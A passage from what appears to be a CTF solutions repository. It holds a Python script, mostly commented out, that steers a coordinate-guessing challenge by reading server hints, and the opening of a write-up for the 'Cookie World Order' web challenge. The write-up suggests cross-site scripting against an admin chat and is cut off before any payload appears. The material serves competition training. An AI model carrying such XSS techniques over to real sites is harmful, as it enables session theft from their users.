| pass 34 | elif response_text.endswith('You are getting closer…'): 35 | # update with new values 36 | lat = float(response_query['lat'][0]) 37 | lon = float(response_query['lon'][0]) 38 | elif response_text.endswith('You are getting away…'): 39 | if is_lat: 40 | print("done, {}".format(query)) 41 | exit() 42 | is_lat = True 43 | except: 44 | print('Error. {}'.format(r.html.text)) 45 | print("url: {}".format(r.url)) 46 | 47 | # states = [0, 1] 48 | # state = 0 49 | # failcount = 0 50 | 51 | # last_lat = lat 52 | # last_lon = lon 53 | 54 | # session = HTMLSession() 55 | # while True: 56 | # query = {'lat': str(lat), 'lon': str(lon), 'token': token} 57 | # print({'lat': lat, 'lon': lon}) 58 | # r = session.get(url, params=query) 59 | # response_url = urlparse(r.url) 60 | # response_query = parse_qs(response_url.query) 61 | # token = response_query['token'][0] 62 | 63 | # try: 64 | # response_text = r.html.find('p')[1].text 65 | # print(response_text) 66 | # print(token) 67 | 68 | # if response_text.startswith('You tried to travel'): 69 | # failcount += 1 70 | # if failcount > 2: 71 | # failcount = 0 72 | # state = (state + 1) % len(states) 73 | 74 | # lat = last_lat 75 | # lon = last_lon 76 | # else: 77 | # failcount = 0 78 | # last_lat = lat 79 | # last_lon = lon 80 | 81 | # if states[state] == 0: 82 | # lon -= inc 83 | # else: 84 | # lat -= inc 85 | # except: 86 | # print('Error. {}'.format(r.html.text)) 87 | # print("url: {}".format(r.url)) 88 | 89 | # time.sleep(1) 90 | 91 | 92 | # states = [2] 93 | # state = 0 94 | # inc = 0.0005 95 | 96 | # last_lat = lat 97 | # last_lon = lon 98 | # failcount = 0 99 | 100 | # while True: 101 | # query = {'lat': str(lat), 'lon': str(lon), 'token': token} 102 | # print({'lat': lat, 'lon': lon}) 103 | # r = session.get(url, params=query) 104 | # response_url = urlparse(r.url) 105 | # response_query = parse_qs(response_url.query) 106 | # token = response_query['token'][0] 107 | 108 | # try: 109 | # response_text = r.html.find('p')[1].text 110 | # print(response_text) 111 | # print(token) 112 | 113 | # if response_text.startswith('You tried to travel'): 114 | # failcount += 1 115 | # if (failcount > 2): 116 | # failcount = 0 117 | # # inc /= 10 118 | 119 | # state = (state + 1) % len(states) 120 | # lat = last_lat 121 | # lon = last_lon 122 | # else: 123 | # failcount = 0 124 | # inc = 0.001 125 | # last_lat = lat 126 | # last_lon = lon 127 | 128 | # if states[state] == 1: 129 | # lat -= inc 130 | # elif states[state] == 2: 131 | # lon -= inc 132 | # elif states[state] == 0: 133 | # lat -= inc 134 | # lon -= inc 135 | # except: 136 | # print('Error. {}'.format(r.html.text)) 137 | # print("url: {}".format(r.url)) 138 | 139 | # input() -------------------------------------------------------------------------------- /09-web-cwo-xss/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Cookie World Order 3 | Label: web 4 | 5 | Good job! You found a further credential that looks like a VPN referred to as the cWo. The organization appears very clandestine and mysterious and reminds you of the secret ruling class of hard shelled turtle-like creatures of Xenon. Funny they trust their security to a contractor outside their systems, especially one with such bad habits. Upon further snooping you find a video feed of those "Cauliflowers" which look to be the dominant lifeforms and members of the cWo. Go forth and attain greater access to reach this creature! 6 | 7 | # Solution 8 | This task gives us a link [https://cwo-xss.web.ctfcompetition.com/](https://cwo-xss.web.ctfcompetition.com/). The website contains a video and a chat window on the right side. It appears that we are chatting with an admin and so it probably requires another xss. However, entering a tag like `